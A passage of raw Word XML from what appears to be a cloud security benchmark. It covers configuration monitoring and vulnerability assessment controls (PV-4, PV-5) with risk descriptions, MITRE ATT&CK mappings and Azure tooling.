    <w:p w14:paraId="7C7CD104" w14:textId="2B621121" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Deploy preventive controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA8A5D" w14:textId="2E237162" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Implement Azure Policy deny effects to prevent deployment of non-compliant configurations at resource creation time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E5050" w14:textId="6FFAF861" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Automate configuration remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439FAB94" w14:textId="7F8B3D39" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t xml:space="preserve">Use Azure Policy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000774C4">
        <w:t>deployIfNotExists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000774C4">
        <w:t xml:space="preserve"> effects to automatically remediate configuration drift without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D77C62" w14:textId="1C5B159F" w:rsidR="00C47351" w:rsidRDefault="000774C4" w:rsidP="000774C4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc242449550"/>
      <w:r w:rsidRPr="000774C4">
        <w:lastRenderedPageBreak/>
        <w:t>PV-4: Audit and enforce secure configurations for compute resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="132C9E05" w14:textId="6FE15787" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF78E1" w14:textId="44E5B841" w:rsidR="000774C4" w:rsidRDefault="000774C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000774C4">
        <w:t xml:space="preserve">Continuously monitor and alert on configuration deviations from defined baselines in compute resources. Enforce desired configurations through automated remediation that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000774C4">
        <w:t>prevents</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000774C4">
        <w:t xml:space="preserve"> non-compliant configurations or automatically </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000774C4">
        <w:t>applies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000774C4">
        <w:t xml:space="preserve"> corrective measures to maintain security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180F8B2" w14:textId="43D4F779" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5384AA30" w14:textId="3B07CFDB" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Configuration drift on critical systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF62429" w14:textId="233910FE" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Production systems gradually deviate from secure baselines through legitimate changes, emergency modifications, and incremental updates-weakening security posture without triggering alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C8746" w14:textId="2FC75481" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Patch management gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128553D8" w14:textId="628AAFA2" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve">Missing security updates </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>leave</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve"> compute resources vulnerable to known exploits while organizations believe systems are current.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F51FDC" w14:textId="48AFDD2D" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Service sprawl vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641B1A0" w14:textId="2267786B" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>New services and applications installed on compute resources introduce security weaknesses that bypass baseline security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282DA1A9" w14:textId="0FAA3C84" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Container runtime security drift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1E5E2" w14:textId="6BD36AD8" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Container orchestration platforms allow runtime modifications that can weaken security policies and expose underlying infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3F1EA" w14:textId="11428C8B" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Compliance verification gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1561BDF9" w14:textId="52AEAA41" w:rsidR="00AF5AFE" w:rsidRPr="000774C4" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Without continuous monitoring, compute resources fall out of compliance with regulatory requirements between periodic audits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C38A7C8" w14:textId="65C33E46" w:rsidR="00C47351" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFCB325" w14:textId="2E33DB35" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F6B0E6" w14:textId="7E8F4E55" w:rsidR="00A701DE" w:rsidRDefault="00A701DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A701DE">
        <w:t>exploitation for privilege escalation (T1068) targeting systems with configuration drift allowing elevated access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF3580" w14:textId="4F6874F2" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD943BE" w14:textId="0D724DCD" w:rsidR="00A701DE" w:rsidRDefault="00A701DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A701DE">
        <w:lastRenderedPageBreak/>
        <w:t>impair defenses (T1562) leveraging configuration changes that weakened security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EDAD9C" w14:textId="39EC4086" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F9EF0F" w14:textId="67D9021D" w:rsidR="00A701DE" w:rsidRDefault="00A701DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A701DE">
        <w:t>modify authentication process (T1556) exploiting authentication configuration drift to maintain persistent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A449202" w14:textId="0EDFB15A" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2575302B" w14:textId="1C95E8BA" w:rsidR="00A701DE" w:rsidRDefault="00A701DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A701DE">
        <w:t>system information discovery (T1082) gathering information from misconfigured systems to identify attack opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E1292" w14:textId="0687A85A" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE" w:rsidP="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PV-4.1: Implement compute configuration monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF53C2" w14:textId="15F4586B" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve">Maintain </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>compute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve"> security through continuous configuration assessment and enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061A9FC7" w14:textId="04524F70" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Continuously assess compute security configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F46AE60" w14:textId="5DD15A0F" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Use Microsoft Defender for Cloud to continuously assess compute resource security configurations against industry benchmarks and best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E045193" w14:textId="3F860D86" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Implement ongoing compliance monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630DF8F4" w14:textId="7AC8F5B4" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Deploy Azure Machine Configuration for ongoing compliance monitoring and automated remediation of configuration drift.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D8A71A" w14:textId="24030EC8" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Maintain desired configuration state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BBC31" w14:textId="281A46AD" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Use Azure Automation State Configuration to maintain desired configuration state across compute resources with automated correction capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682C227" w14:textId="77777777" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE" w:rsidP="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528BFCAA" w14:textId="324248E0" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Monitor configuration changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A404B15" w14:textId="3FE59F59" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Implement Change Tracking and Inventory to monitor configuration changes across compute resources and detect unauthorized modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A8AD8E" w14:textId="0F8AA208" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Enable container security posture monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F94A771" w14:textId="3BFB09C2" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE" w:rsidP="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc242449551"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>PV-5: Perform vulnerability assessments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="58B5CF9A" w14:textId="3D861A7B" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4EFF05" w14:textId="71D24480" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve">Perform comprehensive vulnerability assessments across all cloud resources on a scheduled basis and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>on-demand</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5AFE">
        <w:lastRenderedPageBreak/>
        <w:t>Track and compare scan results to verify remediation effectiveness. Include assessment of infrastructure vulnerabilities, application weaknesses, configuration issues, and network exposures while securing administrative access used for scanning activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB08AE7" w14:textId="61E53F70" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7DA821B4" w14:textId="3D3699CE" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Unknown vulnerability exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B516CDB" w14:textId="4CAE52A8" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Systems contain security weaknesses that remain undetected until exploited-providing attackers with established footholds that bypass security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314AF832" w14:textId="178B3669" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Outdated vulnerability databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E237023" w14:textId="4561C68F" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Security teams lack current knowledge of emerging threats and newly discovered vulnerabilities affecting their infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B3B133" w14:textId="11F46999" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Multi-layer blind spots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C13DF" w14:textId="740B0385" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve">Traditional network-focused scanning </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>misses</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t xml:space="preserve"> vulnerabilities in cloud services, container images, serverless functions, and managed services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB9533" w14:textId="32BA7F9C" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Configuration-based vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B50331" w14:textId="174894F1" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Misconfigurations and policy weaknesses escape detection by traditional vulnerability scanners focused on software flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0762D8F0" w14:textId="71DA7503" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Privileged access risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289DA4E" w14:textId="3FF3C935" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Administrative accounts used for vulnerability scanning create additional attack vectors if not properly secured and monitored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE741E5" w14:textId="1972B54E" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Assessment coverage gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD8988" w14:textId="06F616DA" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Incomplete scanning leaves portions of infrastructure unassessed, creating safe havens for attacker operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9488E" w14:textId="2F5810F1" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Remediation tracking failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF48AFA" w14:textId="07D7F149" w:rsidR="00AF5AFE" w:rsidRDefault="00AF5AFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5AFE">
        <w:t>Without systematic vulnerability tracking, organizations lose visibility into which vulnerabilities have been addressed and which remain outstanding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5B6F8" w14:textId="4415B3E7" w:rsidR="0021039F" w:rsidRDefault="0021039F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0021039F">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11000A99" w14:textId="54389BC1" w:rsidR="0021039F" w:rsidRDefault="0021039F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0021039F">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B61E1" w14:textId="0204BE9B" w:rsidR="003649DB" w:rsidRDefault="003649DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003649DB">
        <w:lastRenderedPageBreak/>
        <w:t>exploit public-facing application (T1190) leveraging unpatched vulnerabilities in web applications and services</w:t>
